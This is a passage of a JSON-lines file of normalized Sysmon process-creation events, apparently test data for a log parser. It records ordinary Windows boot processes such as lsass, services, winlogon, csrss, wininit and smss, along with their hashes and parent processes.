"System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p -s PlugPlay", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-00105b6c0000", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "732", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.555Z", "type": "raw", "uuid": "a0915c30-6be9-439a-af1c-b2bcad1f847f"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:24.0541859Z\"},\"EventRecordID\":\"27393\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.341\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-001075590000}\"},{\"Name\":\"ProcessId\",\"text\":\"616\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Local Security Authority Process\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"lsass.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0FB26350106C9BDD196D4E7D01EB30007663687C,MD5=568C5CBF9877F6B9E39D1E7CA0FF0A36,SHA256=BBC83E4759D4B82BAD31E371AD679AA414C72273BF97CEE5AED8337ED8A4D79F,IMPHASH=09FDE88C65E2BC5F1F90E96B673C52B1\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010904d0000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"468\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wininit.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"wininit.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\lsass.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-001075590000", "object.process.hash.imphash": "09FDE88C65E2BC5F1F90E96B673C52B1", "object.process.hash.md5": "568C5CBF9877F6B9E39D1E7CA0FF0A36", "object.process.hash.sha1": "0FB26350106C9BDD196D4E7D01EB30007663687C", "object.process.hash.sha256": "BBC83E4759D4B82BAD31E371AD679AA414C72273BF97CEE5AED8337ED8A4D79F", "object.process.id": "616", "object.process.meta": "Description:Local Security Authority Process | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "lsass.exe", "object.process.original_name": "lsass.exe", "object.process.parent.cmdline": "wininit.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\wininit.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-0010904d0000", "object.process.parent.id": "468", "object.process.parent.name": "wininit.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.341Z", "type": "raw", "uuid": "81830ca8-18c5-4475-af8a-3d934ff5fccb"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:24.0496887Z\"},\"EventRecordID\":\"27390\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.295\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ProcessId\",\"text\":\"584\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1075 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Services and Controller app\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"services.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=617A0A0BAAB180541DB739C4A6851D784943C317,MD5=DB896369FB58241ADF28515E3765C514,SHA256=A2E369DF26C88015FE1F97C7542D6023B5B1E4830C25F94819507EE5BCB1DFCC,IMPHASH=7D2820FC8CAF521DC2058168B480D204\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010904d0000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"468\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wininit.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"wininit.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\services.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.hash.imphash": "7D2820FC8CAF521DC2058168B480D204", "object.process.hash.md5": "DB896369FB58241ADF28515E3765C514", "object.process.hash.sha1": "617A0A0BAAB180541DB739C4A6851D784943C317", "object.process.hash.sha256": "A2E369DF26C88015FE1F97C7542D6023B5B1E4830C25F94819507EE5BCB1DFCC", "object.process.id": "584", "object.process.meta": "Description:Services and Controller app | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "services.exe", "object.process.original_name": "services.exe", "object.process.parent.cmdline": "wininit.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\wininit.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-0010904d0000", "object.process.parent.id": "468", "object.process.parent.name": "wininit.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1075 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.295Z", "type": "raw", "uuid": "46902b14-015c-4394-9641-13ed346157c9"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:23.8762823Z\"},\"EventRecordID\":\"27388\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.240\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-001096530000}\"},{\"Name\":\"ProcessId\",\"text\":\"568\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\winlogon.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1075 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Logon Application\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"WINLOGON.EXE\"},{\"Name\":\"CommandLine\",\"text\":\"winlogon.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=573ED5AED255DCEC948BCEA8C28EC9F3802A2E64,MD5=E8B1A6B8C6EA5972C123A816DF237AF8,SHA256=290C8C4B387B669B3988938D0083AA4B210365FB0855EAE010F49062A9DDEB04,IMPHASH=A5F3EBEF8618DCA7C7ACCF623BABBB86\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010794d0000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"460\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe 000000d8 00000084 \"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "winlogon.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\winlogon.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-001096530000", "object.process.hash.imphash": "A5F3EBEF8618DCA7C7ACCF623BABBB86", "object.process.hash.md5": "E8B1A6B8C6EA5972C123A816DF237AF8", "object.process.hash.sha1": "573ED5AED255DCEC948BCEA8C28EC9F3802A2E64", "object.process.hash.sha256": "290C8C4B387B669B3988938D0083AA4B210365FB0855EAE010F49062A9DDEB04", "object.process.id": "568", "object.process.meta": "Description:Windows Logon Application | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "winlogon.exe", "object.process.original_name": "WINLOGON.EXE", "object.process.parent.cmdline": "\\SystemRoot\\System32\\smss.exe 000000d8 00000084", "object.process.parent.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-0010794d0000", "object.process.parent.id": "460", "object.process.parent.name": "smss.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1075 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.240Z", "type": "raw", "uuid": "7e40c8f1-951d-4570-ad62-dfab2746be9f"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:23.2245281Z\"},\"EventRecordID\":\"27385\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.143\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010714e0000}\"},{\"Name\":\"ProcessId\",\"text\":\"476\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\csrss.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Client Server Runtime Process\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"CSRSS.Exe\"},{\"Name\":\"CommandLine\",\"text\":\"%%SystemRoot%%\\\\system32\\\\csrss.exe ObjectDirectory=\\\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=779B8AFC3FA2528B090F400EF3D592E0E2775955,MD5=7D64128BC1EECE41196858897596EBC8,SHA256=FB40ED0FFA6BC795923A941DAB6B7D6B43583D0F152A6DF4D8953D2C1A0CB417,IMPHASH=A96FA9912E09E361274AD77F1A4B252C\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010794d0000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"460\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe 000000d8 00000084 \"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "%%SystemRoot%%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\csrss.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-0010714e0000", "object.process.hash.imphash": "A96FA9912E09E361274AD77F1A4B252C", "object.process.hash.md5": "7D64128BC1EECE41196858897596EBC8", "object.process.hash.sha1": "779B8AFC3FA2528B090F400EF3D592E0E2775955", "object.process.hash.sha256": "FB40ED0FFA6BC795923A941DAB6B7D6B43583D0F152A6DF4D8953D2C1A0CB417", "object.process.id": "476", "object.process.meta": "Description:Client Server Runtime Process | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "csrss.exe", "object.process.original_name": "CSRSS.Exe", "object.process.parent.cmdline": "\\SystemRoot\\System32\\smss.exe 000000d8 00000084", "object.process.parent.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-0010794d0000", "object.process.parent.id": "460", "object.process.parent.name": "smss.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.143Z", "type": "raw", "uuid": "83ca66eb-bd74-476d-9ad0-a4c45f93e864"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:23.2225195Z\"},\"EventRecordID\":\"27383\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.130\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010904d0000}\"},{\"Name\":\"ProcessId\",\"text\":\"468\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\wininit.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Start-Up Application\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"WinInit.exe\"},{\"Name\":\"CommandLine\",\"text\":\"wininit.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=389E257A924EA521E830C31712494D33B38841A8,MD5=4E20895E641F2C3E68AB3DB91A1A16F1,SHA256=13AD43EE6D19DFC9709C3106D796BC3F21791A564E443D042A5AA117F2680649,IMPHASH=C2F90ACB28AF147D0D0C3408B9EE38C5\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b763-5ea4-0000-00106a480000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"388\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe 000000cc 00000084 \"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "wininit.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\wininit.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-0010904d0000", "object.process.hash.imphash": "C2F90ACB28AF147D0D0C3408B9EE38C5", "object.process.hash.md5": "4E20895E641F2C3E68AB3DB91A1A16F1", "object.process.hash.sha1": "389E257A924EA521E830C31712494D33B38841A8", "object.process.hash.sha256": "13AD43EE6D19DFC9709C3106D796BC3F21791A564E443D042A5AA117F2680649", "object.process.id": "468", "object.process.meta": "Description:Windows Start-Up Application | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "wininit.exe", "object.process.original_name": "WinInit.exe", "object.process.parent.cmdline": "\\SystemRoot\\System32\\smss.exe 000000cc 00000084", "object.process.parent.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.parent.guid": "747f3d96-b763-5ea4-0000-00106a480000", "object.process.parent.id": "388", "object.process.parent.name": "smss.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.130Z", "type": "raw", "uuid": "b4bf2f0e-8425-4798-9974-43f65dd92796"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:23.2204815Z\"},\"EventRecordID\":\"27380\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.128\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010794d0000}\"},{\"Name\":\"ProcessId\",\"text\":\"460\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1131 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Session Manager\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft 